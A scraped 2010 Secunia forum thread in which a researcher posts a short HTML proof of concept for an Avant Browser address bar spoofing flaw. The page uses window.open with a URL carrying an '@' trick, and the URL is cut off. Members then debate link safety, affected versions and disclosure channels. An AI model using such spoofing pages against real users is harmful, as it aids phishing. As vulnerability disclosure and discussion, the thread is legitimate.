Secunia
Login
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Forum Thread: Avant Browser Address Bar Spoofing Vulnerability
You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.This thread was submitted in the following forum:
Vulnerabilities
| Pouya | Avant Browser Address Bar Spoofing Vulnerability |
|---|---|
 |
19th Jul, 2010 16:53 |
|
Ranking: 4 Posts: 6 User Since: 9th Jun, 2010 System Score: N/A Location: IR |
<!-- Avant Browser (@) Address Bar Spoofing Vulnerability Discovered by: Pouya Daneshmand http://Securitylab.ir/Advisories --> <html> <head> <script type="text/javascript"> function Spoof() { window.open("http://www.Securitylab.ir@yaho } </script> </head> <body> <form> <p align="center"> <input type="button" value="Click Here" onclick="Spoof()"> </p> </form> </body> </html> -- http://Pouya.Securitylab.ir |
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
19th Jul, 2010 17:44 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 19th Jul, 2010 17:44 |
please read what I posted in his Opera Browser thread***: I suggest that you do not click on the link shown in this post until Secunia/an expert reads it and advises - unless you know what you are doing. This post clearly is way beyond my technical ability but you may wish to look at the following Bing search results (or search yourself). You'll see many unsafe sites in the search. http://www.bing.com/search?q=pouya+Daneshmand&src=... ***http://secunia.com/community/forum/thread/show/478... -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
||||||||
|
|||||||||
| Maurice Joyce | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 01:47 | ||||||||
| Score: 10538 Posts: 8,113 User Since: 4th Jan 2009 System Score: 100% Location: UK |
I have tested all the sites on pages 1 & 2 produced from your hyperlink here: http://www.bing.com/search?q=pouya+Daneshmand&src= All are perfectly safe. If U fully research all the findings U will note that bad gradings have been contradicted by safe gradings. This happens. Norton Safe,WOT & other like programmes are powered by user gradings or those owning websites registering their site. Sites not reported on will receive a negative. That means nothing. Reporting users can be novices suffering from total paranoia to researchers who file an accurate assessment of a sites safety. At the end of the day these "add ons programmes" are advisories. If U have faith in your security there is no reason not to research sites, grade them & in most cases benefit from what they have to offer. 00:45 20/07/2010 -- Maurice Windows 7 SP1 64 Bit OS HP Intel Pentium i7 IE 10 for Windows 7 SP1 16GB RAM |
||||||||
|
|||||||||
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 08:59 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 20th Jul, 2010 09:02 |
thank you for that Maurice. As you know, I am not a technical expert when it comes to computers. I have to rely on the likes of Bing & Norton - both say that they test the sites, and they actually invite the owners of such sites to contact them to have the site tested. Tested sites have a red or green flag - untested sites a grey flag. WOT is based on what users have said, as you say. I wouldn't know how to test a site for 'safety', Maurice - I suspect many members wouldn't either. Are you saying that you simply open it and rely on your AV software to stop any problems if it is in fact a security risk site?? I do trust my AV but I wouldn't tempt fate. If I did, it would be just my luck to go to a site sontaing a threat that hasn't yet been picked up by my AV! :0) Also, have you had chance to test the links in http://secunia.com/community/forum/thread/show/478... -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
||||||||
|
|||||||||
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 12:22 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
@taffy Unsafe?, what is your purpose? -- http://Pouya.Securitylab.ir |
||||||||
|
|||||||||
| irsdl | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 13:16 | ||||||||
| Score: 12 Posts: 10 User Since: 16th Jul 2010 System Score: N/A Location: UK |
"http://securitylab.ir/Advisories" is not accessible. Could you please provide more information about your findings (App. Version, Vendor, Download Link, etc...). For example "http://secunia.com/community/forum/thread/show/478..." does not work on the latest version of Opera Browser which is 10.60. Thanks for the contributing in advance. -- ------ Soroush Dalili soroush.secproject.com/blog/ |
||||||||
|
|||||||||
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 14:09 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
Avant Browser vulnerability tested on Version 11.7,build 45 (v11.7,build 46 is also vulnerable) Opera 10.60 not work? you are wrong probably, tested on Opera v10.60,build 3445 work successfully . -- http://Pouya.Securitylab.ir |
||||||||
|
|||||||||
| Maurice Joyce | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 14:20 | ||||||||
| Score: 10538 Posts: 8,113 User Since: 4th Jan 2009 System Score: 100% Location: UK |
@taffy078 I think @Pouya has answered the question for U. What is the point of all these warnings (policing) of threads when U are saying U have no idea how to test links. Surely they should all be left alone until such time as Secunia deems them irrelevant & if necessary removes them. I would certainly issue a warning if I could prove BEYOND doubt they were "troublesome". They are not hence I elect not to comment on individuals or hyperlinks contained within a post. This thread is NO THREAT to anyone & as we can see has provoked a very relevant request for more information. To save writing to other threads the same can be said for advertising of Passcert which appears to be disliked by "The Gang Of Three". They offer a lot more to the IT community than many clearly marked adverts on this thread which appear to come,in the main, from a PC comic called Computer Active. http://secunia.com/community/forum/thread/show/465... Better we leave all this warning (policing)type of activity to Secunia - they own both the programme & Forum & are very capable of telling us if things are amiss. I note one Forum member considers himself part owner of the Forum. The mind boggles. To answer your question directly of course I open all these links where unnecessary doubt is raised about their authenticity merely to counter or confirm alarmist posts. -- Maurice Windows 7 SP1 64 Bit OS HP Intel Pentium i7 IE 10 for Windows 7 SP1 16GB RAM |
||||||||
|
|||||||||
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 14:27 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 20th Jul, 2010 14:28 |
Everyone who has a PC has to take care to make it secure - firewalls and anti-virus software are the most well-known & well-used tools in this respect. But it’s also essential that everyone takes care when accessing new websites. Some are unsafe. When I checked out the link (in the first post) with Norton & Bing, many of the sites shown were flagged as unsafe. For example, one had four viruses: two Bloodhound, a Backdoor & a Trojan, according to Norton. I do realise that these sites are likely to have been ones that had reported Pouya’s findings i.e. were not his sites. I rely on Norton & Bing to advise me of sites on the web that I should avoid. That they may occasionaly get it wrong doesn't bother me - I will always err on the side of caution, being a PC-user and not a PC-expert. Norton's rating is a result of Symantec's automated analysis system, using their servers to analyze Web sites. Yes - they do use reviews written by customers, some of whom may be paranoid, but these are shown separately. As it was a Saturday i.e. likely that the Support team weren’t in, I simply posted an alert for members not to visit the linked sites until they or another expert had checked them out, or unless they knew what they were doing. Maurice has since done that. If you, Pouya, are the Pouya Daneshmand who discovered the vulnerabilities, I hope that you will accept my explanation. But I would suggest that a great many members or viewers here are not experts so I stand by what I posted. EDIT Crossed with your, Maurice. -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
||||||||
|
|||||||||
| Anthony Wells | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 14:28 | ||||||||
| Score: 2329 Posts: 3,205 User Since: 19th Dec 2007 System Score: N/A Location: N/A Last edited on 20th Jul, 2010 14:40 |
@Pouya , If you are wishing to alert Secunia themselves to look at your findings , then you might wish to email them at vuln@secunia.com as suggested by this webpage in the Advisories section of this website :- http://secunia.com/advisories/report_vulnerability... This forum is more used for sorting out problems with updating programmes after the PSI or the CSI software have detected a vulnerable programme/piece of software/hardware ; of course some of the more technically advanced users might find your posting(s) here of interest . Take care Anthony PS: I can confirm that te hyperlinks in this post are not working (for me) from France ; the "blog" link in your other Opera tread is working -- It always seems impossible until its done. Nelson Mandela |
||||||||
|
|||||||||
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 16:01 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
@irsdl @Anthony Wells Opera spoofing simple video ;) http://www.youtube.com/watch?v=lHprYkpZn6w Quality: 720p -- http://Pouya.Securitylab.ir |
||||||||
|
|||||||||
| thedillpickl | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
20th Jul, 2010 17:22 | ||||||||
| Score: 376 Posts: 872 User Since: 3rd May 2009 System Score: 100% Location: US Last edited on 20th Jul, 2010 17:31 |
I understand the original purpose of this thread (somewhat). This is not it. But, as the gang's all here... 1) I hold to the foolish notion that one should not go where one has no idea what's going on. (Go ahead and make your best crack at that comment, I've come to expect it.) Simply do a little research before running scripts on any machine. Looking at reports and papers on any website could be dangerous if that site is unknown to you. Click on a link and pow. BTW, you run a risk whenever you connect to the internet. If firewalled & security software is in place, it is slight, but still there. 2) If we (That's right, I said we.) are to work together on this forum, perhaps some guidance would be in order. Everyone will not be well versed on every subject. The discussion above is a start, less remarks. 3) I was the guilty party that said I take part ownership of this forum. Of course, it is Secunia's to do with as they please. I did not set it up. I did not pay for anything. I was not asked to moderate or take any control. However, I was invited to participate. If you are to participate it is required to become involved. If you are involved it is required to interact. This is hard to do, if not impossible, when those around you are not also allowed to participate. Last I checked, Secunia still calls this a forum and not a lecture hall. Fred p.s. Could we call this advertising? http://secunia.com/community/forum/thread/show/480... -- XP Home Chrome, Firefox, IE8 -- consilio et animis |
||||||||
|
|||||||||
| Anthony Wells | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
|
21st Jul, 2010 12:22 | ||||||||
| Score: 2329 Posts: 3,205 User Since: 19th Dec 2007 System Score: N/A Location: N/A |
@Pouya , Thank you for the link to your Opera spoofing video on YouTube ; most enlightening :) Take care Anthony -- It always seems impossible until its done. Nelson Mandela |
||||||||
|
|||||||||
